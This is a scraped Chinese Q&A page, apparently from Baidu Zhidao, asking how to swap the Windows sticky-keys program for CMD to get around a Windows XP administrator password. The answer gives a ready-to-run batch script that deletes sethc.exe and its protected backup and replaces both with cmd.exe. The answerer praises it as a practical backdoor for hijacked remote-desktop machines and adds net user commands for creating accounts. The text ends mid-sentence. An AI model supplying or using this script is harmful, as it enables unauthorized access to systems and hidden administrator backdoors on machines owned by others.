UC知道[高分]如何把粘滞键改为CMD
来源:百度知道 编辑:UC知道 时间:2024/07/01 07:28:45
曾经在电脑商情报上面看过一个菜鸟破WIN XP管理员密码的方法
就是如果没有补一个漏洞的话.在输入密码的时候连续按5次SHIFT键可以调出粘滞键.然后原理就是把调出的粘滞键改为CMD 这样就能改管理员密码或者创建新帐户了
问题就是 用什么方法可以把粘滞键改为CMD.
难道没有达人吗= =
Windows的粘滞键。是按5下shift后,windows就执行了system32下的sethc.exe。即使
在3389中,都可以弹出!!
它本来是为不方便按组合键的人设计的。 如果我们把那个sethc.exe替换成我们想要的其它文件,比如说cmd.exe,那么就可以像你说的创建用户了.
其实写的批处理就可以解决了 又不麻烦
@echo off
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
我把它保存为5shift.bat。当我们运行它的时候,sethc.exe 就被换成了改了名的cmd.exe了。
可能由于cmd也是系统文件,所以替换是并没有弹出文件保护。呵呵。
个人感觉这个后门非常实用(特别是3389肉鸡!)。哪个管理员会考虑到这种后门呢
然后你就可以创建用户了
net user [UserName [Password | *] [options] [/domain]
net user [UserName {Password | *} /add [options] [/domain]
net user [UserName [/delete] [/domain]
昏倒啊,那是后门好不好,不是漏洞!
黑客为了可以再次